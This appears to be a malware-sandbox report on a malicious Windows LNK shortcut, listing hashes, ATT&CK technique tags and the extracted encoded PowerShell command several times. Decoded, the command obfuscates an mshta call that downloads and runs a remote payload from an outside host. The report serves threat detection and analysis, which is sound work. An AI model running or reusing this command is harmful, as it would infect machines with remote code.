Malicious
Malicious

75f59f9c03b721915c2239610c1b5272

LNK File
|
MD5: 75f59f9c03b721915c2239610c1b5272
|
Size: 2.63 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
75f59f9c03b721915c2239610c1b5272
Sha1
f82a63e52de3bfa5b1016e65871293e394357d8b
Sha256
49fcf9080afcb05987918952b9cbdcaf3bdfb369928d6372ca73f3a8e4b54f6f
Sha384
6b974ea8ec49f3338799ec8606d4b8208d05c16276793b3fd5b0d2c1bd65f76d29af7e3ebdaecb4609fa530acf4b6ad4
Sha512
ef8595a030efb9391384f1042ec2c4b89e0e1b3edb63a8716de1a7e6edc73029e22799037951d098fc82e0a3b6e6022fda70af24ff90e32af84e8db6a11b8e57
SSDeep
24:8Ayw/BHYVKVWf+/CW+RO0OaTfHgcU0IMJm0sHCEJMdd79dsrab7Z:8y5aXRTt0cU0IMJUiuMdJ9AaZ
TLSH
2151C3281AF502EAF677CBB9A7F973B24876FB96CD2546BC008023411622510B467E7A
File Structure
75f59f9c03b721915c2239610c1b5272
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
75f59f9c03b721915c2239610c1b5272 (2.63 KB)
File Structure
75f59f9c03b721915c2239610c1b5272
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA

Malicious

75f59f9c03b721915c2239610c1b5272
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"

Malicious

75f59f9c03b721915c2239610c1b5272 > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙